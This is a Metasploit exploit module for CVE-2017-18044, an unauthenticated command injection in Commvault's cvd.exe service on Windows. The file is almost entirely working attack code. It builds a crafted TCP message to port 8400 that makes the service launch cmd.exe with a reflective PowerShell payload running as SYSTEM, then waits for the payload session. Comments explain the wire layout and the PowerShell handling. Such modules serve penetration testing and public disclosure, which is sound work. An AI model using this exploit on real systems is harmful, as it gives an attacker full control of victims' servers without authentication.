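##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated command injection against the Commvault Communications
# Service (cvd.exe) on Windows (CVE-2017-18044).
#
# The module opens one TCP connection to cvd (default port 8400), sends a
# single length-prefixed message whose body names cmd.exe followed by a
# PowerShell one-liner, and then waits for the payload's session. Because
# cvd runs as SYSTEM by default and requires no authentication, the payload
# runs with SYSTEM privileges ('Privileged' => true).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell

  # cvd message type that carries a command to run (observed value used by
  # the original advisory/module; the exact protocol semantics are not
  # documented here).
  MSG_TYPE = 9

  # Interpreter that cvd is asked to launch; the PowerShell one-liner is
  # passed to it via /c.
  CMD_PATH = 'C:\Windows\System32\cmd.exe'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Commvault Communications Service (cvd) Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability
          discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
          and v10). The vulnerability exists in the cvd.exe service and allows an
          attacker to execute arbitrary commands in the context of the service. By
          default, the Commvault Communications service installs and runs as SYSTEM in
          Windows and does not require authentication. This vulnerability was discovered
          in the Windows version. The Linux version wasn't tested.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
        ],
        'References' => [
          ['CVE', '2017-18044'],
          ['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
        ],
        'Platform' => 'win',
        'Targets' => [
          [
            'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
            {
              'Arch' => [ARCH_X64, ARCH_X86]
            }
          ],
        ],
        'Privileged' => true,
        'DefaultTarget' => 0,
        'DisclosureDate' => '2017-12-12',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(8400)])
  end

  # Connects to cvd, sends the single crafted message and hands control to
  # the payload handler. No response from the service is read or parsed.
  def exploit
    buf = build_exploit
    print_status("Connecting to Commvault Communications Service.")
    connect
    print_status("Executing payload")
    # One message is all the injection needs.
    sock.put(buf)
    # Wait for the payload to call back / bind.
    handler
    disconnect
  end

  # Builds the cvd message that carries the payload.
  #
  # Wire layout (integers are big-endian u32, filler comes from make_nops):
  #
  #   [body length][8 filler][MSG_TYPE][328 filler]
  #   "C:\Windows\System32\cmd.exe; /c \"<powershell one-liner>\" && echo \0"
  #   [u32 0]
  #
  # The leading u32 is the length of everything that follows it, so it is
  # measured in bytes (bytesize), not characters — the body contains raw
  # filler bytes and the two would differ if the command ever held
  # non-ASCII text.
  #
  # @return [String] the complete message, ready for sock.put
  def build_exploit
    # cmd_psh_payload yields a "cmd.exe /c powershell ..." style one-liner.
    # cvd already runs the command through cmd.exe (CMD_PATH above), so strip
    # everything before "powershell" to avoid a redundant cmd.exe hop.
    full_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
    psh_idx = full_cmd.index('powershell')
    fail_with(Failure::BadConfig, 'Generated PowerShell command does not contain "powershell"') if psh_idx.nil?
    ps_cmd = full_cmd[psh_idx..-1]

    # NOTE(review): ps_cmd is wrapped in double quotes below, so it must not
    # itself contain a '"'. The -EncodedCommand form requested here is base64
    # and should not, but confirm if the cmd_psh_payload options change.

    # make_nops output is used purely as filler for the fixed-size header
    # fields; build the body as a binary string so bytesize is exact.
    body = ''.b
    body << make_nops(8)
    body << [MSG_TYPE].pack('I>')
    body << make_nops(328)
    body << CMD_PATH
    body << '; /c "'
    body << ps_cmd.b
    body << '" && echo '
    body << "\x00"
    body << [0].pack('I>')

    [body.bytesize].pack('I>') + body
  end
end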